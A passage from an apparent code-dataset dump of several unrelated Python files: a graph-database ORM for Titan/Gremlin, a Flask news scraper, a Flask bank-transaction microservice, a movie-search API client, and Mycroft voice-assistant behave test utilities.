y[1].position))\n \n #TODO: check that the defined columns don't conflict with any of the Model API's existing attributes/methods\n #transform column definitions\n for k,v in column_definitions:\n _transform_column(k,v)\n \n #check for duplicate column names\n col_names = set()\n for v in column_dict.values():\n if v.db_field_name in col_names:\n raise ModelException(\"{} defines the column {} more than once\".format(name, v.db_field_name))\n col_names.add(v.db_field_name)\n\n #create db_name -> model name map for loading\n db_map = {}\n for field_name, col in column_dict.items():\n db_map[col.db_field_name] = field_name\n\n #add management members to the class\n attrs['_columns'] = column_dict\n attrs['_db_map'] = db_map\n \n #auto link gremlin methods\n gremlin_methods = {}\n \n #get inherited gremlin methods\n for base in bases:\n for k,v in getattr(base, '_gremlin_methods', {}).items():\n gremlin_methods.setdefault(k, v)\n\n #short circuit __abstract__ inheritance\n attrs['__abstract__'] = attrs.get('__abstract__', False)\n \n #short circuit path inheritance\n gremlin_path = attrs.get('gremlin_path')\n attrs['gremlin_path'] = gremlin_path\n\n def wrap_method(method):\n def method_wrapper(self, *args, **kwargs):\n return method(self, *args, **kwargs)\n return method_wrapper\n \n for k,v in attrs.items():\n if isinstance(v, BaseGremlinMethod):\n gremlin_methods[k] = v\n method = wrap_method(v)\n attrs[k] = method\n if v.classmethod: attrs[k] = classmethod(method)\n if v.property: attrs[k] = property(method)\n\n attrs['_gremlin_methods'] = gremlin_methods\n\n #create the class and add a QuerySet to it\n klass = super(ElementMetaClass, cls).__new__(cls, name, bases, attrs)\n \n #configure the gremlin methods\n for name, method in gremlin_methods.items():\n method.configure_method(klass, name, gremlin_path)\n \n return klass\n\n\nclass Element(BaseElement):\n \"\"\"\n the db name for the column family can be set as the attribute db_name, or\n it will be generated from the class name\n \"\"\"\n __metaclass__ = ElementMetaClass\n \n @classmethod\n def deserialize(cls, data):\n \"\"\"\n Deserializes rexster json into vertex or edge objects\n \"\"\"\n dtype = data.get('_type')\n if dtype == 'vertex':\n vertex_type = data['element_type']\n return vertex_types[vertex_type](**data)\n elif dtype == 'edge':\n edge_type = data['_label']\n return edge_types[edge_type](data['_outV'], data['_inV'], **data)\n else:\n raise TypeError(\"Can't deserialize '{}'\".format(dtype))\n \n \nclass VertexMetaClass(ElementMetaClass):\n \"\"\"Metaclass for vertices.\"\"\"\n \n def __new__(cls, name, bases, attrs):\n\n #short circuit element_type inheritance\n attrs['element_type'] = attrs.pop('element_type', None)\n\n klass = super(VertexMetaClass, cls).__new__(cls, name, bases, attrs)\n\n if not klass.__abstract__:\n element_type = klass.get_element_type()\n if element_type in vertex_types and str(vertex_types[element_type]) != str(klass):\n raise ElementDefinitionException('{} is already registered as a vertex'.format(element_type))\n vertex_types[element_type] = klass\n\n #index requested indexed columns\n klass._create_indices()\n\n return klass\n\n \nclass Vertex(Element):\n \"\"\"\n The Vertex model base class. All vertexes have a vid defined on them, the element type is autogenerated\n from the subclass name, but can optionally be set manually\n \"\"\"\n __metaclass__ = VertexMetaClass\n __abstract__ = True\n\n gremlin_path = 'vertex.groovy'\n\n _save_vertex = GremlinMethod()\n _traversal = GremlinMethod()\n _delete_related = GremlinMethod()\n\n #vertex id\n vid = columns.UUID(save_strategy=columns.SAVE_ONCE)\n \n element_type = None\n\n @classmethod\n def _create_indices(cls):\n \"\"\"\n Creates this model's indices. This will be skipped if connection.setup hasn't been\n called, but connection.setup calls this method on existing vertices\n \"\"\"\n from thunderdome.connection import _hosts, _index_all_fields, create_key_index\n \n if not _hosts: return\n for column in cls._columns.values():\n if column.index or _index_all_fields:\n create_key_index(column.db_field_name)\n \n @classmethod\n def get_element_type(cls):\n \"\"\"\n Returns the element type for this vertex.\n\n :rtype: str\n \n \"\"\"\n return cls._type_name(cls.element_type)\n \n @classmethod\n def all(cls, vids, as_dict=False):\n \"\"\"\n Load all vertices with the given vids from the graph. By default this\n will return a list of vertices but if as_dict is True then it will\n return a dictionary containing vids as keys and vertices found as values.\n\n :param vids: A list of vids\n :type vids: list\n :param as_dict: Toggle whether or not to return a dictionary or list\n :type as_dict: boolean\n :rtype: dict or list\n \n \"\"\"\n if not isinstance(vids, (list, tuple)):\n raise ThunderdomeQueryError(\"vids must be of type list or tuple\")\n \n strvids = [str(v) for v in vids]\n qs = ['vids.collect{g.V(\"vid\", it).toList()[0]}']\n \n results = execute_query('\\n'.join(qs), {'vids':strvids})\n results = filter(None, results)\n \n if len(results) != len(vids):\n raise ThunderdomeQueryError(\"the number of results don't match the number of vids requested\")\n \n objects = []\n for r in results:\n try:\n objects += [Element.deserialize(r)]\n except KeyError:\n raise ThunderdomeQueryError('Vertex type \"{}\" is unknown'.format())\n \n if as_dict:\n return {v.vid:v for v in objects}\n \n return objects\n\n def _reload_values(self):\n \"\"\"\n Method for reloading the current vertex by reading its current values\n from the database.\n \"\"\"\n results = execute_query('g.v(eid)', {'eid':self.eid})[0]\n del results['_id']\n del results['_type']\n return results\n\n @classmethod\n def get(cls, vid):\n \"\"\"\n Look up vertex by thunderdome assigned UUID. Raises a DoesNotExist\n exception if a vertex with the given vid was not found. Raises a\n MultipleObjectsReturned exception if the vid corresponds to more\n than one vertex in the graph.\n\n :param vid: The thunderdome assigned UUID\n :type vid: str\n :rtype: thunderdome.models.Vertex\n \n \"\"\"\n try:\n results = cls.all([vid])\n if len(results) >1:\n raise cls.MultipleObjectsReturned\n\n result = results[0]\n if not isinstance(result, cls):\n raise WrongElementType(\n '{} is not an instance or subclass of {}'.format(result.__class__.__name__, cls.__name__)\n )\n return result\n except ThunderdomeQueryError:\n raise cls.DoesNotExist\n \n @classmethod\n def get_by_eid(cls, eid):\n \"\"\"\n Look update a vertex by its Titan-specific id (eid). Raises a DoesNotExist\n exception if a vertex with the given eid was not found.\n\n :param eid: The numeric Titan-specific id\n :type eid: int\n :rtype: thunderdome.models.Vertex\n \n \"\"\"\n results = execute_query('g.v(eid)', {'eid':eid})\n if not results:\n raise cls.DoesNotExist\n return Element.deserialize(results[0])\n \n def save(self, *args, **kwargs):\n \"\"\"\n Save the current vertex using the configured save strategy, the default\n save strategy is to re-save all fields every time the object is saved.\n \"\"\"\n super(Vertex, self).save(*args, **kwargs)\n params = self.as_save_params()\n params['element_type'] = self.get_element_type()\n result = self._save_vertex(params)[0]\n self.eid = result.eid\n for k,v in self._values.items():\n v.previous_value = result._values[k].previous_value\n return result\n \n def delete(self):\n \"\"\"\n Delete the current vertex from the graph.\n \"\"\"\n if self.__abstract__:\n raise ThunderdomeException('cant delete abstract elements')\n if self.eid is None:\n return self\n query = \"\"\"\n g.removeVertex(g.v(eid))\n g.stopTransaction(SUCCESS)\n \"\"\"\n results = execute_query(query, {'eid': self.eid})\n \n def _simple_traversal(self,\n operation,\n label,\n limit=None,\n offset=None,\n allowed_elements=None):\n \"\"\"\n Perform simple graph database traversals with ubiquitous pagination.\n\n :param operation: The operation to be performed\n :type operation: str\n :param label: The edge label to be used\n :type label: str or Edge\n :param start: The starting offset\n :type start: int\n :param max_results: The maximum number of results to return\n :type max_results: int\n :param allowed_elements: The list of allowed result elements\n :type allowed_elements: list\n \n \"\"\"\n if inspect.isclass(label) and issubclass(label, Edge):\n label = label.get_label()\n elif isinstance(label, Edge):\n label = label.get_label()\n\n allowed_elts = None\n if allowed_elements is not None:\n allowed_elts = []\n for e in allowed_elements:\n if issubclass(e, Vertex):\n allowed_elts += [e.get_element_type()]\n elif issubclass(e, Edge):\n allowed_elts += [e.get_label()]\n\n if limit is not None and offset is not None:\n start = offset\n end = offset + limit\n else:\n start = end = None\n \n return self._traversal(operation,\n label,\n start,\n end,\n allowed_elts)\n\n def _simple_deletion(self, operation, label):\n \"\"\"\n Perform simple bulk graph deletion operation.\n\n :param operation: The operation to be performed\n :type operation: str\n :param label: The edge label to be used\n :type label: str or Edge\n \n \"\"\"\n if inspect.isclass(label) and issubclass(label, Edge):\n label = label.get_label()\n elif isinstance(label, Edge):\n label = label.get_label()\n\n return self._delete_related(operation, label)\n\n def outV(self,\n label=None,\n limit=None,\n offset=None,\n allowed_elements=None):\n \"\"\"\n Return a list of vertices reached by traversing the outgoing edge\n with the given label.\n \n :param label: The edge label to be traversed\n :type label: str or BaseEdge\n :param limit: The number of the page to start returning results at\n :type limit: int or None\n :param offset: The maximum number of results to return\n :type offset: int or None\n :param allowed_elements: A list of allowed element types\n :type allowed_elements: list\n \n \"\"\"\n return self._simple_traversal('outV',\n label,\n limit,\n offset,\n allowed_elements)\n\n def inV(self,\n label=None,\n limit=None,\n offset=None,\n allowed_elements=None):\n \"\"\"\n Return a list of vertices reached by traversing the incoming edge\n with the given label.\n \n :param label: The edge label to be traversed\n :type label: str or BaseEdge\n :param limit: The number of the page to start returning results at\n :type limit: int or None\n :param offset: The maximum number of results to return\n :type offset: int or None\n :param allowed_elements: A list of allowed element types\n :type allowed_elements: list\n \n \"\"\"\n return self._simple_traversal('inV',\n label,\n limit,\n offset,\n allowed_elements)\n\n def outE(self,\n label=None,\n limit=None,\n offset=None,\n allowed_elements=None):\n \"\"\"\n Return a list of edges with the given label going out of this vertex.\n \n :param label: The edge label to be traversed\n :type label: str or BaseEdge\n :param limit: The number of the page to start returning results at\n :type limit: int or None\n :param offset: The maximum number of results to return\n :type offset: int or None\n :param allowed_elements: A list of allowed element types\n :type allowed_elements: list\n \n \"\"\"\n return self._simple_traversal('outE',\n label,\n limit,\n offset,\n allowed_elements)\n\n def inE(self,\n label=None,\n limit=None,\n offset=None,\n allowed_elements=None):\n \"\"\"\n Return a list of edges with the given label coming into this vertex.\n \n :param label: The edge label to be traversed\n :type label: str or BaseEdge\n :param limit: The number of the page to start returning results at\n :type limit: int or None\n :param offset: The maximum number of results to return\n :type offset: int or None\n :param allowed_elements: A list of allowed element types\n :type allowed_elements: list\n \n \"\"\"\n return self._simple_traversal('inE',\n label,\n limit,\n offset,\n allowed_elements)\n\n def bothE(self,\n label=None,\n limit=None,\n offset=None,\n allowed_elements=None):\n \"\"\"\n Return a list of edges both incoming and outgoing from this vertex.\n\n :param label: The edge label to be traversed (optional)\n :type label: str or BaseEdge or None\n :param limit: The number of the page to start returning results at\n :type limit: int or None\n :param offset: The maximum number of results to return\n :type offset: int or None\n :param allowed_elements: A list of allowed element types\n :type allowed_elements: list\n \n \"\"\"\n return self._simple_traversal('bothE',\n label,\n limit,\n offset,\n allowed_elements)\n \n def bothV(self,\n label=None,\n limit=None,\n offset=None,\n allowed_elements=None):\n \"\"\"\n Return a list of vertices both incoming and outgoing from this vertex.\n\n :param label: The edge label to be traversed (optional)\n :type label: str or BaseEdge or None\n :param limit: The number of the page to start returning results at\n :type limit: int or None\n :param offset: The maximum number of results to return\n :type offset: int or None\n :param allowed_elements: A list of allowed element types\n :type allowed_elements: list\n \n \"\"\"\n return self._simple_traversal('bothV',\n label,\n limit,\n offset,\n allowed_elements)\n\n\n def delete_outE(self, label=None):\n \"\"\"Delete all outgoing edges with the given label.\"\"\"\n self._simple_deletion('outE', label)\n\n def delete_inE(self, label=None):\n \"\"\"Delete all incoming edges with the given label.\"\"\"\n self._simple_deletion('inE', label)\n\n def delete_outV(self, label=None):\n \"\"\"Delete all outgoing vertices connected with edges with the given label.\"\"\"\n self._simple_deletion('outV', label)\n\n def delete_inV(self, label=None):\n \"\"\"Delete all incoming vertices connected with edges with the given label.\"\"\"\n self._simple_deletion('inV', label)\n \n \ndef to_offset(page_num, per_page):\n \"\"\"\n Convert a page_num and per_page to offset.\n\n :param page_num: The current page number\n :type page_num: int\n :param per_page: The maximum number of results per page\n :type per_page: int\n :rtype: int\n \n \"\"\"\n if page_num and per_page:\n return (page_num-1) * per_page\n else:\n return None\n \n \nclass PaginatedVertex(Vertex):\n \"\"\"\n Convenience class to easily handle pagination for traversals\n \"\"\"\n __abstract__ = True\n def outV(self,\n label=None,\n page_num=None,\n per_page=None,\n allowed_elements=None):\n return super(PaginatedVertex, self).outV(label, per_page, to_offset(page_num, per_page), allowed_elements)\n \n def outE(self,\n label=None,\n page_num=None,\n per_page=None,\n allowed_elements=None):\n return super(PaginatedVertex, self).outE(label, per_page, to_offset(page_num, per_page), allowed_elements)\n \n def inV(self,\n label=None,\n page_num=None,\n per_page=None,\n allowed_elements=None):\n return super(PaginatedVertex, self).inV(label, per_page, to_offset(page_num, per_page), allowed_elements)\n \n def inE(self,\n label=None,\n page_num=None,\n per_page=None,\n allowed_elements=None):\n return super(PaginatedVertex, self).inE(label, per_page, to_offset(page_num, per_page), allowed_elements)\n \n def bothV(self,\n label=None,\n page_num=None,\n per_page=None,\n allowed_elements=None):\n return super(PaginatedVertex, self).bothV(label, per_page, to_offset(page_num, per_page), allowed_elements)\n \n def bothE(self,\n label=None,\n page_num=None,\n per_page=None,\n allowed_elements=None):\n return super(PaginatedVertex, self).bothE(label, per_page, to_offset(page_num, per_page), allowed_elements)\n \n \nclass EdgeMetaClass(ElementMetaClass):\n \"\"\"Metaclass for edges.\"\"\"\n \n def __new__(cls, name, bases, attrs):\n #short circuit element_type inheritance\n attrs['label'] = attrs.pop('label', None)\n\n klass = super(EdgeMetaClass, cls).__new__(cls, name, bases, attrs)\n\n if not klass.__abstract__:\n label = klass.get_label()\n if label in edge_types and str(edge_types[label]) != str(klass):\n raise ElementDefinitionException('{} is already registered as an edge'.format(label))\n edge_types[klass.get_label()] = klass\n return klass\n\n \nclass Edge(Element):\n \"\"\"Base class for all edges.\"\"\"\n \n __metaclass__ = EdgeMetaClass\n __abstract__ = True\n\n # if set to True, no more than one edge will\n # be created between two vertices\n __exclusive__ = False\n \n label = None\n \n gremlin_path = 'edge.groovy'\n \n _save_edge = GremlinMethod()\n _get_edges_between = GremlinMethod(classmethod=True)\n \n def __init__(self, outV, inV, **values):\n \"\"\"\n Initialize this edge with the outgoing and incoming vertices as well\n as edge properties.\n\n :param outV: The vertex this edge is coming out of\n :type outV: Vertex\n :param inV: The vertex this edge is going into\n :type inV: Vertex\n :param values: The properties for this edge\n :type values: dict\n \n \"\"\"\n self._outV = outV\n self._inV = inV\n super(Edge, self).__init__(**values)\n \n @classmethod\n def get_label(cls):\n \"\"\"\n Returns the label for this edge.\n\n :rtype: str\n \n \"\"\"\n return cls._type_name(cls.label)\n \n @classmethod\n def get_between(cls, outV, inV, page_num=None, per_page=None):\n \"\"\"\n Return all the edges with a given label between two vertices.\n \n :param outV: The vertex the edge comes out of.\n :type outV: Vertex\n :param inV: The vertex the edge goes into.\n :type inV: Vertex\n :param page_num: The page number of the results\n :type page_num: int\n :param per_page: The number of results per page\n :type per_page : int\n :rtype: list\n \n \"\"\"\n return cls._get_edges_between(outV=outV, inV=inV,\n label=cls.get_label(),\n page_num=page_num,\n per_page=per_page)\n \n def validate(self):\n \"\"\"\n Perform validation of this edge raising a ValidationError if any problems\n are encountered.\n \"\"\"\n if self.eid is None:\n if self._inV is None:\n raise ValidationError('in vertex must be set before saving new edges')\n if self._outV is None:\n raise ValidationError('out vertex must be set before saving new edges')\n super(Edge, self).validate()\n \n def save(self, *args, **kwargs):\n \"\"\"\n Save this edge to the graph database.\n \"\"\"\n super(Edge, self).save(*args, **kwargs)\n return self._save_edge(self._outV,\n self._inV,\n self.get_label(),\n self.as_save_params(),\n exclusive=self.__exclusive__)[0]\n\n def _reload_values(self):\n \"\"\"\n Re-read the values for this edge from the graph database.\n \"\"\"\n results = execute_query('g.e(eid)', {'eid':self.eid})[0]\n del results['_id']\n del results['_type']\n return results\n\n @classmethod\n def get_by_eid(cls, eid):\n \"\"\"\n Return the edge with the given Titan-specific eid. Raises a\n DoesNotExist exception if no edge is found.\n\n :param eid: The Titan-specific edge id (eid)\n :type eid: int\n \n \"\"\"\n results = execute_query('g.e(eid)', {'eid':eid})\n if not results:\n raise cls.DoesNotExist\n return Element.deserialize(results[0])\n\n @classmethod\n def create(cls, outV, inV, *args, **kwargs):\n \"\"\"\n Create a new edge of the current type coming out of vertex outV and\n going into vertex inV with the given properties.\n\n :param outV: The vertex the edge is coming out of\n :type outV: Vertex\n :param inV: The vertex the edge is going into\n :type inV: Vertex\n \n \"\"\"\n return super(Edge, cls).create(outV, inV, *args, **kwargs)\n \n def delete(self):\n \"\"\"\n Delete the current edge from the graph.\n \"\"\"\n if self.__abstract__:\n raise ThunderdomeException('cant delete abstract elements')\n if self.eid is None:\n return self\n query = \"\"\"\n g.removeEdge(g.e(eid))\n g.stopTransaction(SUCCESS)\n \"\"\"\n results = execute_query(query, {'eid':self.eid})\n\n def _simple_traversal(self, operation):\n \"\"\"\n Perform a simple traversal starting from the current edge returning a\n list of results.\n\n :param operation: The operation to be performed\n :type operation: str\n :rtype: list\n \n \"\"\"\n results = execute_query('g.e(eid).%s()'%operation, {'eid':self.eid})\n return [Element.deserialize(r) for r in results]\n \n def inV(self):\n \"\"\"\n Return the vertex that this edge goes into.\n\n :rtype: Vertex\n \n \"\"\"\n if self._inV is None:\n self._inV = self._simple_traversal('inV')\n elif isinstance(self._inV, (int, long)):\n self._inV = Vertex.get_by_eid(self._inV)\n return self._inV\n \n def outV(self):\n \"\"\"\n Return the vertex that this edge is coming out of.\n\n :rtype: Vertex\n \n \"\"\"\n if self._outV is None:\n self._outV = self._simple_traversal('outV')\n elif isinstance(self._outV, (int, long)):\n self._outV = Vertex.get_by_eid(self._outV)\n return self._outV\n","sub_path":"thunderdome/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":33772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"511472302","text":"import requests\nfrom bs4 import BeautifulSoup\n\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n # return 'Tesssttt'\n return render_template('index.html')\n\n\n@app.route('/detik-pop')\ndef detik_pop():\n url = 'https://www.detik.com/terpopuler'\n rs = requests.get(url, params={'tag_from': 'framebar'})\n\n sp = BeautifulSoup(rs.text, 'html.parser')\n\n pop_area = sp.find(attrs={'class': 'grid-row list-content'})\n\n judul = pop_area.findAll(attrs={'class': 'media__title'})\n foto = pop_area.findAll(attrs={'class': 'media__image'})\n\n return render_template('index.html', gambar = foto)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"399225306","text":"''' \n*****TRANSACTION API******\n1. Create Transaction(Interaction with account api)\n2. Delete Transaction\n3. Get Transaction\n***********************\n'''\n\n\nfrom flask import Flask\nimport requests\nimport sys\nimport logging\nimport simplejson as json\nimport urllib\nfrom flask import request\nfrom flask import Response\nfrom flask import Blueprint\napp = Flask(__name__)\n\ndb = {\n \"name\": \"http://cmpt756db:30002/api/v1/datastore\",\n \"endpoint\": [\n \"read\",\n \"write\",\n \"delete\",\n \"update\"\n ]\n}\nbp = Blueprint('app', __name__)\n@bp.route('/health')\ndef health():\n return Response(\"\", status=200, mimetype=\"application/json\")\n\n@bp.route('/readiness')\ndef readiness():\n return Response(\"\", status=200, mimetype=\"application/json\")\n\n@bp.route('/', methods=['GET'])\ndef list_all():\n headers = request.headers\n # check header here\n if 'Authorization' not in headers:\n return Response(json.dumps({\"error\": \"missing auth\"}), status=401, mimetype='application/json')\n # list all songs here\n return {}\n\n@bp.route('/', methods=['GET'])\ndef get_transaction(transaction_id):\n headers = request.headers\n # check header here\n if 'Authorization' not in headers:\n return Response(json.dumps({\"error\": \"missing auth\"}), status=401, mimetype='application/json')\n payload = {\"objtype\": \"transaction\", \"objkey\": transaction_id}\n url = db['name'] + '/' + db['endpoint'][0]\n response = requests.get(url, params = payload, headers = {'Authorization': headers['Authorization']})\n return (response.json())\n\n@bp.route('/', methods=['POST'])\n@bp.route('/', methods=['GET'])\n@bp.route('/', methods=['PUT'])\ndef create_transaction():\n headers = request.headers\n # check header here\n if request.method == 'POST':\n try:\n content = request.get_json()\n TransactionType = content['TransactionType']\n AccountId = content['AccountId']\n Amount = content['Amount'] \n except: \n return json.dumps({\"message\": \"error reading arguments\"})\n url = db['name'] + '/' + db['endpoint'][1]\n response0 = requests.post(url, json = {\"objtype\": \"transaction\", \"TransactionType\":TransactionType, \"AccountId\": AccountId, \"Amount\": Amount})\n amount = content['Amount']\n transactionType = content['TransactionType']\n payload = {\"objtype\": \"account\", \"objkey\": content['AccountId']}\n url = db['name'] + '/' + db['endpoint'][0]\n response1 = requests.get(url, params = payload)\n details = response1.json()\n details = details['Items'][0]\n account_id = details['account_id']\n balance = details['Balance']\n if transactionType == 'credit':\n new_balance = balance + amount\n else:\n new_balance = balance - amount\n url = db['name'] + '/' + db['endpoint'][3]\n response = requests.put(url, params = {\"objtype\": \"account\", \"objkey\": account_id}, json = {\"Balance\": new_balance})\n return (response0.json())\n\n@bp.route('/', methods=['DELETE'])\ndef delete_transaction(transaction_id):\n headers = request.headers\n # check header here\n if 'Authorization' not in headers:\n return Response(json.dumps({\"error\": \"missing auth\"}), status=401, mimetype='application/json')\n url = db['name'] + '/' + db['endpoint'][2]\n response = requests.delete(url, params = { \"objtype\": \"transaction\", \"objkey\": transaction_id}, headers = {'Authorization': headers['Authorization']})\n return (response.json())\n \napp.register_blueprint(bp, url_prefix='/api/v1/transaction/')\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n logging.error(\"missing port arg 1\")\n sys.exit(-1)\n\n p = int(sys.argv[1])\n app.debug = True\n app.run(host='0.0.0.0', port=p, threaded=True)\n","sub_path":"code/e-k8s/transaction/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"271611456","text":"import requests\nimport collections\n\n\nMovieResult = collections.namedtuple('MovieResult', 'rating, imdb_code, title, director, duration, year, imdb_score, '\n\t\t\t\t\t\t\t\t\t\t\t\t\t'keywords, genres')\n\n\ndef find_movies(search):\n\tif not search or not search.strip():\n\t\traise ValueError('Search text is required.')\n\n\turl = f'http://movie_service.talkpython.fm/api/search/{search}'\n\tresp = requests.get(url)\n\tresp.raise_for_status()\n\n\tmovie_data = resp.json()\n\tmovies_list = movie_data.get('hits')\n\n\tmovies = [MovieResult(**md) for md in movies_list]\n\n\tmovies.sort(key=lambda x: -x.year)\n\n\treturn movies\n","sub_path":"10_movie_search_app/movie_svc.py","file_name":"movie_svc.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"157065457","text":"# Copyright 2020 Mycroft AI Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\"\"\"Common tools to use when creating step files for behave tests.\"\"\"\n\nfrom threading import Event\nimport time\n\nfrom mycroft.audio.utils import wait_while_speaking\nfrom mycroft.messagebus import Message\n\n\nDEFAULT_TIMEOUT = 10\n\n\nclass CriteriaWaiter:\n \"\"\"Wait for a message to meet a certain criteria.\n\n Args:\n msg_type: message type to watch\n criteria_func: Function to determine if a message fulfilling the\n test case has been found.\n context: behave context\n \"\"\"\n def __init__(self, msg_type, criteria_func, context):\n self.msg_type = msg_type\n self.criteria_func = criteria_func\n self.context = context\n self.result = Event()\n\n def reset(self):\n \"\"\"Reset the wait state.\"\"\"\n self.result.clear()\n\n # TODO: Remove in 21.08\n def wait_unspecific(self, timeout):\n \"\"\"\n Wait for a specified time for criteria to be fulfilled by any message.\n\n This use case is deprecated and only for backward compatibility\n\n Args:\n timeout: Time allowance for a message fulfilling the criteria, if\n provided will override the normal normal step timeout.\n\n Returns:\n tuple (bool, str) test status and debug output\n \"\"\"\n timeout = timeout or self.context.step_timeout\n start_time = time.monotonic()\n debug = ''\n while time.monotonic() < start_time + timeout:\n for message in self.context.bus.get_messages(None):\n status, test_dbg = self.criteria_func(message)\n debug += test_dbg\n if status:\n self.context.matched_message = message\n self.context.bus.remove_message(message)\n return True, debug\n self.context.bus.new_message_available.wait(0.5)\n # Timed out return debug from test\n return False, debug\n\n def _check_historical_messages(self):\n \"\"\"Search through the already received messages for a match.\n\n Returns:\n tuple (bool, str) test status and debug output\n\n \"\"\"\n debug = ''\n for message in self.context.bus.get_messages(self.msg_type):\n status, test_dbg = self.criteria_func(message)\n debug += test_dbg\n if status:\n self.context.matched_message = message\n self.context.bus.remove_message(message)\n self.result.set()\n break\n return debug\n\n def wait_specific(self, timeout=None):\n \"\"\"Wait for a specific message type to fullfil a criteria.\n\n Uses an event-handler to not repeatedly loop.\n\n Args:\n timeout: Time allowance for a message fulfilling the criteria, if\n provided will override the normal normal step timeout.\n\n Returns:\n tuple (bool, str) test status and debug output\n \"\"\"\n timeout = timeout or self.context.step_timeout\n\n debug = ''\n\n def on_message(message):\n nonlocal debug\n status, test_dbg = self.criteria_func(message)\n debug += test_dbg\n if status:\n self.context.matched_message = message\n self.result.set()\n\n self.context.bus.on(self.msg_type, on_message)\n # Check historical messages\n historical_debug = self._check_historical_messages()\n\n # If no matching message was already caught, wait for it\n if not self.result.is_set():\n self.result.wait(timeout=timeout)\n self.context.bus.remove(self.msg_type, on_message)\n return self.result.is_set(), historical_debug + debug\n\n def wait(self, timeout=None):\n \"\"\"Wait for a specific message type to fullfil a criteria.\n\n Uses an event-handler to not repeatedly loop.\n\n Args:\n timeout: Time allowance for a message fulfilling the criteria, if\n provided will override the normal normal step timeout.\n\n Returns:\n (result (bool), debug (str)) Result containing status and debug\n message.\n \"\"\"\n if self.msg_type is None:\n return self.wait_unspecific(timeout)\n else:\n return self.wait_specific(timeout)\n\n\ndef then_wait(msg_type, criteria_func, context, timeout=None):\n \"\"\"Wait for a specific message type to fullfil a criteria.\n\n Uses an event-handler to not repeatedly loop.\n\n Args:\n msg_type: message type to watch\n criteria_func: Function to determine if a message fulfilling the\n test case has been found.\n context: behave context\n timeout: Time allowance for a message fulfilling the criteria, if\n provided will override the normal normal step timeout.\n\n Returns:\n (result (bool), debug (str)) Result containing status and debug\n message.\n \"\"\"\n waiter = CriteriaWaiter(msg_type, criteria_func, context)\n return waiter.wait(timeout)\n\n\ndef then_wait_fail(msg_type, criteria_func, context, timeout=None):\n \"\"\"Wait for a specified time, failing if criteria is fulfilled.\n\n Args:\n msg_type: message type to watch\n criteria_func: Function to determine if a message fulfilling the\n test case has been found.\n context: behave context\n timeout: Time allowance for a message fulfilling the criteria\n\n Returns:\n tuple (bool, str) test status and debug output\n \"\"\"\n status, debug = then_wait(msg_type, criteria_func, context, timeout)\n return not status, debug\n\n\ndef mycroft_responses(context):\n \"\"\"Collect and format mycroft responses from context.\n\n Args:\n context: behave context to extract messages from.\n\n Returns: (str) Mycroft responses including skill and dialog file\n \"\"\"\n responses = ''\n messages = context.bus.get_messages('speak')\n if len(messages) > 0:\n responses = 'Mycroft responded with:\\n'\n for m in messages:\n responses += 'Mycroft: '\n if 'meta' in m.data and 'dialog' in m.data['meta']:\n responses += '{}.dialog'.format(m.data['meta']['dialog'])\n responses += '({})\\n'.format(m.data['meta'].get('skill'))\n responses += '\"{}\"\\n'.format(m.data['utterance'])\n return responses\n\n\ndef print_mycroft_responses(context):\n print(mycroft_responses(context))\n\n\ndef format_dialog_match_error(potential_matches, speak_messages):\n \"\"\"Format error message to be displayed when an expected\n\n This is similar to the mycroft_responses function above. The difference\n is that here the expected responses are passed in instead of making\n a second loop through message bus messages.\n\n Args:\n potential_matches (list): one of the dialog files in this list were\n expected to be spoken\n speak_messages (list): \"speak\" event messages from the message bus\n that don't match the list of potential matches.\n\n Returns: (str) Message detailing the error to the user\n \"\"\"\n error_message = (\n 'Expected Mycroft to respond with one of:\\n'\n f\"\\t{', '.join(potential_matches)}\\n\"\n \"Actual response(s):\\n\"\n )\n if speak_messages:\n for message in speak_messages:\n meta = message.data.get(\"meta\")\n if meta is not None:\n if 'dialog' in meta:\n error_message += f\"\\tDialog: {meta['dialog']}\"\n if 'skill' in meta:\n error_message += f\" (from {meta['skill']} skill)\\n\"\n error_message += f\"\\t\\tUtterance: {message.data['utterance']}\\n\"\n else:\n error_message += \"\\tMycroft didn't respond\"\n\n return error_message\n\n\ndef emit_utterance(bus, utterance):\n \"\"\"Emit an utterance event on the message bus.\n\n Args:\n bus (InterceptAllBusClient): Bus instance to listen on\n utterance (str): list of acceptable dialogs\n \"\"\"\n bus.emit(Message('recognizer_loop:utterance',\n data={'utterances': [utterance],\n 'lang': 'en-us',\n 'session': '',\n 'ident': time.time()},\n context={'client_name': 'mycroft_listener'}))\n\n\ndef wait_for_dialog(bus, dialogs, context=None, timeout=None):\n \"\"\"Wait for one of the dialogs given as argument.\n\n Args:\n bus (InterceptAllBusClient): Bus instance to listen on\n dialogs (list): list of acceptable dialogs\n context (behave Context): optional context providing scenario timeout\n timeout (int): how long to wait for the message, defaults to timeout\n provided by context or 10 seconds\n \"\"\"\n if context:\n timeout_duration = timeout or context.step_timeout\n else:\n timeout_duration = timeout or DEFAULT_TIMEOUT\n wait_for_dialog_match(bus, dialogs, timeout_duration)\n\n\ndef wait_for_dialog_match(bus, dialogs, timeout=DEFAULT_TIMEOUT):\n \"\"\"Match dialogs spoken to the specified list of expected dialogs.\n\n Only one of the dialogs in the provided list need to match for this\n check to be successful.\n\n Args:\n bus (InterceptAllBusClient): Bus instance to listen on\n dialogs (list): list of acceptable dialogs\n timeout (int): how long to wait for the message, defaults to timeout\n provided by context or 10 seconds\n\n Returns:\n A boolean indicating if a match was found and the list of \"speak\"\n events found on the message bus during the matching process.\n \"\"\"\n match_found = False\n speak_messages = 